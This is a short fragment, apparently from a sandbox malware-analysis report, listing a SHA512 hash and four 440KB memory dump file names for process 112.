  SHA512: 6e5040e8146f63aaf184af16c42a9e668765d25114bee389499a00aafa744f92c50a06d95828699cacbc07ab26fd91f5cf87f4e17131572a01fe844bf432cabb

• memory/112-0-0x00000000001F0000-0x000000000025E000-memory.dmp
  Filesize: 440KB

• memory/112-15651-0x00000000001F0000-0x000000000025E000-memory.dmp
  Filesize: 440KB

• memory/112-29866-0x00000000001F0000-0x000000000025E000-memory.dmp
  Filesize: 440KB

• memory/112-29868-0x00000000001F0000-0x000000000025E000-memory.dmp
  Filesize: 440KB